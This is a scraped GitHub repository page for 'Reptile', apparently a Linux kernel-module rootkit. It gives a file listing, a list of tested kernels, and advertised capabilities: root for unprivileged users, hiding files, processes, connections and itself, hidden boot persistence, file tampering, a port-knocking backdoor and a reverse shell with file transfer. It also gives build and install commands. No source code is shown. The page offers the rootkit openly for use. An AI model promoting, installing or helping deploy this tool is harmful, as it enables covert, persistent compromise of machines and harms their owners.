You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
Ighor Augusto 1e17bc82ea
Merge pull request #88 from MaxXor/memory-leaks
2 years ago
configs configuring start script and fixing 3 years ago
kernel configuring start script and fixing 3 years ago
scripts configuring start script and fixing 3 years ago
userland Fix memory leaks on failure 2 years ago
.gitignore Fixing khook and checksum bug; add support to libreadline in client 3 years ago
Kconfig configuring start script and fixing 3 years ago
Makefile Defining PWD 3 years ago Update 3 years ago


Tested on

Debian 9: 4.9.0-8-amd64
Debian 10: 4.19.0-8-amd64
Ubuntu 18.04.1 LTS: 4.15.0-38-generic
Kali Linux: 4.18.0-kali2-amd64
Centos 6.10: 2.6.32-754.6.3.el6.x86_64
Centos 7: 3.10.0-862.3.2.el7.x86_64
Centos 8: 4.18.0-147.5.1.el8_1.x86_64


  • Give root to unprivileged users
  • Hide files and directories
  • Hide processes
  • Hide himself
  • Hide TCP/UDP connections
  • Hidden boot persistence
  • File content tampering
  • Some obfuscation techniques
  • ICMP/UDP/TCP port-knocking backdoor
  • Full TTY/PTY shell with file transfer
  • Client to handle Reptile Shell
  • Shell connect back each X times (not default)


apt install build-essential libncurses-dev linux-headers-$(uname -r)
git clone
cd Reptile
make menuconfig           # or 'make config' or even 'make defconfig'
make install

More details about the installation see Wiki


When you got a sucessfully installation, the way to remove that will be shown in the screen


See Wiki to usage details. So, read the fucking manual before opening an issue!


Some functions of this module is based on another rootkits. Please see the references!



Special thanks to my friend Ilya V. Matveychikov for the KHOOK framework and kmatryoshka loader.


If you wanna more information, send me an e-mail: